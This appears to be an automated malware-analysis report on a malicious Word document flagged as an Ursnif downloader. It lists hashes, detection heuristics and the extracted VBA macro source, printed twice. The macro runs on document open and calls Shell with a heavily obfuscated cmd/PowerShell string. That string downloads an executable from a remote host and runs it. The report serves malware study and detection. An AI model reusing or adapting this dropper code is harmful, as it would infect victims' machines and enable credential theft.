Office (OLE) malware analysis — malicious · 8a5fc4a305ac0fd4

MALICIOUS

Office (OLE)

69.8 KB Created: 2018-09-05 07:20:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: fd43586413155c420828de4a54595112 SHA-1: d9065296a08459a37cada8e25cbf6b84cdbffa23 SHA-256: 8a5fc4a305ac0fd41d0be6badc6616b18e23ef0c099850b5d9d9a8dd41fa59fc

182 Risk Score

Heuristics 5

ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3927 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3927 bytes
SHA-256: `c359eb592086be80d872f630de7bca9ede04bd98cf3445fc9276672c568fcfee`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "DRTRwiSFKzS" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On _ Error _ Resume _ Next Hour "9527" + "7873" + "37651303" + "5136" Hour "TPU" + "SqE" Hour "quAqPXA" + "vEGiRVQG" VBA.Shell CleanString(LIW) + KMsRSTjj + MkjBNdBKUR + MGRTOoboT + Fjsrqj + CuDEroiQRTC + DiiXcXamsIj, 48 - 48 Hour "jUJA" + "cLl" Hour "osJzBZw" + "JwNObrzbH" + "44627896" + "hwVJwTnstpsJl" Hour "TAq" + "T" + "dr" + "1745" End Sub Attribute VB_Name = "aCitpKJfHnAMqj" Function MGRTOoboT() On _ Error _ Resume _ Next Hour "408921371" + "2929" Hour "457104822" + "JquwptvAVhfcc" + "VAwiwjJzd" + "Qriw" Hour "r" + "8551" KKFmTBzZFC = "cmd /V" + "^:" + "^ON/C" + Chr(5 + 4 + 3 + 2 + 20) + "^" + "se^t R" + "^J^L" + "^" + "k= ^ " + "^ ^ " Hour "r" + "iSI" Hour "PzfV" + "bfUEFSja" + "339863942" + "4516" Hour "ibt" + "5507" + "7876" + "897" Hour "JWB" + "uuwRk" + "NC" + "140188785" GjHBU = "^ ^ " + " ^ ^" + " ^ ^ ^ " + "^}}" + "^{" + "^" + "hc^t" + "ac^}" + "^;^k" + "^a^" + "er^b" + ";^m^" Hour "WjQkiH" + "sFwH" + "310214689" + "6934" Hour "448161795" + "138036378" Hour "Cjl" + "dP" + "GDzzoSwKOUtzFo" + "mwO" bUMbT = "t^p" + "^$" + "^ ^met" + "I-^ek^" + "ovn^I^;" + ")^mt^p" + "^$^ ,^" + "DSv^" Hour "PtTBzXClvPZ" + "477149894" siqQX = "$(^e^l" + "i^F^d" + "^" + "a^" + "o^lnw" + "^oD.t^X" + "b$" + "^{y" Hour "jQ" + "549" + "64151038" + "uoAhrcOjRs" Hour "ovVOLqJj" + "29" Hour "vtYT" + "7598" iplwHH = "r^t^{)" + "GAN^" + "$ ni" + "^ D" + "^Sv^" + "$" + "(h" + "ca" + "er" + "o^f^;" + "^'e^x^" + "e." + "^'+t" Hour "39951222" + "ZYwVLUTA" + "X" + "FU" Hour "6682" + "394862022" Hour "rGT" + "r" NhsjSVw = "zR^$" + "^+^" + "'^\" + "'^+ci^" + "l" Hour "km" + "t" qtKAfBZNX = "^" + "b^up:" + "vne" + "^" + "$=^mt^p" + "^$^;'^" + "17" Hour "XupsT" + "Ydb" IrzWikzwU = "^3" + "^' ^=" + "^ t^zR$" + "^;)'@'(" + "ti^lp^" + "S^.^'" + "n^k" + "t.1rgr^" + "=^" + "l^?php" + "^.^hdsa" + "no^u^h/" + "YU" Hour "T" + "adKPQjNlPAEwZ" + "YQatwzt" + "5961" Hour "nLATdr" + "7522" GnCTZJ = "^Y/^moc" + "^." + "eqcx^z^" + "dsao^" + "pop/" + "/:p" + "tth^'^=" Hour "1729" + "518174323" Hour "iJ" + "469920665" QAQTpGuht = "GAN^$" + "^" + ";^" + "tn" + "eilC^" + "be^" + "W.^t" + "eN ^tc^" + "ej^b^" + "o^-^w^e" + "n^=^t" + "X^b^$" Hour "qdKlfooV" + "n" + "L" + "UJTwQzWE" Hour "ktN" + "885" + "psvaP" + "wDSp" jZAjvqMPo = "^ ^ll" + "e" + "h^" + "sr^" + "ew" + "o^p" + "&&^f" + "^or /^L" + " %^B" + " ^i" Hour "wqzf" + "jZJFnft" + "XZb" + "1952" Hour "qiq" + "GXNShLN" + "422214759" + "OjEQhCz" Hour "rSRzd" + "Mp" Hour "476471720" + "78581482" + "1968" + "4286" ztrzGn = "n (" + "^2^61^" + ",^-1" + ",^0" + ")^d^o" + " ^" + "s^et T" MGRTOoboT = KKFmTBzZFC + GjHBU + bUMbT + siqQX + iplwHH + NhsjSVw + qtKAfBZNX + IrzWikzwU + GnCTZJ + QAQTpGuht + jZAjvqMPo + ztrzGn Hour "O" + "175032094" Hour "a" + "MpSjrusOJoIGzL" + "iP" + "fDPYrf" Hour "IpnP" + "3006" End Function Function Fjsrqj() On _ Error _ Resume _ Next Hour "YBc" + "bV" + "WUvb" + "wzLTUwm" Hour "bKjTnJmj" + "113543549" + "35639890" + "453695157" Hour "ko" + "3790" + "477076727" + "4624" Hour "30151264" + "401759172" Hour "wClCbtO" + "40108130" QbiHj = "^j^E^U" + "=!T^j^" + "E^U!" + "!R^J^" + "L^k:~%^" + "B,1!&" + "&i" + "^f %" + "^B=^=^" + "0 " + "c^a" + "^l" Hour "pp" + "5933" Hour "TQnsIn" + "i" + "fSH" + "3352" Hour "133516207" + "CMpWYAnA" kiTjn = "^l %" + "T^j" + "^E" + "^" + "U:^" + "*^T" + "jE" + "^U^!^=" + "%" + Chr(5 + 4 + 3 + 2 + 20) Fjsrqj = QbiHj + kiTjn Hour "287381456" + "qpLhjHMnhHcbr" Hour "5535" + "zBsIqiN" End Function

SHA-256: c359eb592086be80d872f630de7bca9ede04bd98cf3445fc9276672c568fcfee

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "DRTRwiSFKzS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Hour "9527" + "7873" + "37651303" + "5136"
   Hour "TPU" + "SqE"
   Hour "quAqPXA" + "vEGiRVQG"
VBA.Shell CleanString(LIW) + KMsRSTjj + MkjBNdBKUR + MGRTOoboT + Fjsrqj + CuDEroiQRTC + DiiXcXamsIj, 48 - 48
   Hour "jUJA" + "cLl"
   Hour "osJzBZw" + "JwNObrzbH" + "44627896" + "hwVJwTnstpsJl"
   Hour "TAq" + "T" + "dr" + "1745"
End Sub



Attribute VB_Name = "aCitpKJfHnAMqj"
Function MGRTOoboT()

On _
Error _
Resume _
Next
Hour "408921371" + "2929"
   Hour "457104822" + "JquwptvAVhfcc" + "VAwiwjJzd" + "Qriw"
   Hour "r" + "8551"
KKFmTBzZFC = "cmd /V" + "^:" + "^ON/C" + Chr(5 + 4 + 3 + 2 + 20) + "^" + "se^t R" + "^J^L" + "^" + "k=  ^ " + "^ ^ "
Hour "r" + "iSI"
   Hour "PzfV" + "bfUEFSja" + "339863942" + "4516"
   Hour "ibt" + "5507" + "7876" + "897"
   Hour "JWB" + "uuwRk" + "NC" + "140188785"
GjHBU = "^  ^ " + "  ^   ^" + " ^ ^ ^ " + "^}}" + "^{" + "^" + "hc^t" + "ac^}" + "^;^k" + "^a^" + "er^b" + ";^m^"
Hour "WjQkiH" + "sFwH" + "310214689" + "6934"
   Hour "448161795" + "138036378"
   Hour "Cjl" + "dP" + "GDzzoSwKOUtzFo" + "mwO"
bUMbT = "t^p" + "^$" + "^ ^met" + "I-^ek^" + "ovn^I^;" + ")^mt^p" + "^$^ ,^" + "DSv^"
Hour "PtTBzXClvPZ" + "477149894"
siqQX = "$(^e^l" + "i^F^d" + "^" + "a^" + "o^lnw" + "^oD.t^X" + "b$" + "^{y"
Hour "jQ" + "549" + "64151038" + "uoAhrcOjRs"
   Hour "ovVOLqJj" + "29"
   Hour "vtYT" + "7598"
iplwHH = "r^t^{)" + "GAN^" + "$ ni" + "^ D" + "^Sv^" + "$" + "(h" + "ca" + "er" + "o^f^;" + "^'e^x^" + "e." + "^'+t"
Hour "39951222" + "ZYwVLUTA" + "X" + "FU"
   Hour "6682" + "394862022"
   Hour "rGT" + "r"
NhsjSVw = "zR^$" + "^+^" + "'^\" + "'^+ci^" + "l"
Hour "km" + "t"
qtKAfBZNX = "^" + "b^up:" + "vne" + "^" + "$=^mt^p" + "^$^;'^" + "17"
Hour "XupsT" + "Ydb"
IrzWikzwU = "^3" + "^' ^=" + "^ t^zR$" + "^;)'@'(" + "ti^lp^" + "S^.^'" + "n^k" + "t.1rgr^" + "=^" + "l^?php" + "^.^hdsa" + "no^u^h/" + "YU"
Hour "T" + "adKPQjNlPAEwZ" + "YQatwzt" + "5961"
   Hour "nLATdr" + "7522"
GnCTZJ = "^Y/^moc" + "^." + "eqcx^z^" + "dsao^" + "pop/" + "/:p" + "tth^'^="
Hour "1729" + "518174323"
   Hour "iJ" + "469920665"
QAQTpGuht = "GAN^$" + "^" + ";^" + "tn" + "eilC^" + "be^" + "W.^t" + "eN ^tc^" + "ej^b^" + "o^-^w^e" + "n^=^t" + "X^b^$"
Hour "qdKlfooV" + "n" + "L" + "UJTwQzWE"
   Hour "ktN" + "885" + "psvaP" + "wDSp"
jZAjvqMPo = "^ ^ll" + "e" + "h^" + "sr^" + "ew" + "o^p" + "&&^f" + "^or /^L" + " %^B" + " ^i"
Hour "wqzf" + "jZJFnft" + "XZb" + "1952"
   Hour "qiq" + "GXNShLN" + "422214759" + "OjEQhCz"
   Hour "rSRzd" + "Mp"
   Hour "476471720" + "78581482" + "1968" + "4286"
ztrzGn = "n (" + "^2^61^" + ",^-1" + ",^0" + ")^d^o" + " ^" + "s^et T"
MGRTOoboT = KKFmTBzZFC + GjHBU + bUMbT + siqQX + iplwHH + NhsjSVw + qtKAfBZNX + IrzWikzwU + GnCTZJ + QAQTpGuht + jZAjvqMPo + ztrzGn
   Hour "O" + "175032094"
   Hour "a" + "MpSjrusOJoIGzL" + "iP" + "fDPYrf"
   Hour "IpnP" + "3006"
End Function
Function Fjsrqj()

On _
Error _
Resume _
Next
Hour "YBc" + "bV" + "WUvb" + "wzLTUwm"
   Hour "bKjTnJmj" + "113543549" + "35639890" + "453695157"
   Hour "ko" + "3790" + "477076727" + "4624"
   Hour "30151264" + "401759172"
   Hour "wClCbtO" + "40108130"
QbiHj = "^j^E^U" + "=!T^j^" + "E^U!" + "!R^J^" + "L^k:~%^" + "B,1!&" + "&i" + "^f %" + "^B=^=^" + "0 " + "c^a" + "^l"
Hour "pp" + "5933"
   Hour "TQnsIn" + "i" + "fSH" + "3352"
   Hour "133516207" + "CMpWYAnA"
kiTjn = "^l %" + "T^j" + "^E" + "^" + "U:^" + "*^T" + "jE" + "^U^!^=" + "%" + Chr(5 + 4 + 3 + 2 + 20)
Fjsrqj = QbiHj + kiTjn
   Hour "287381456" + "qpLhjHMnhHcbr"
   Hour "5535" + "zBsIqiN"
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.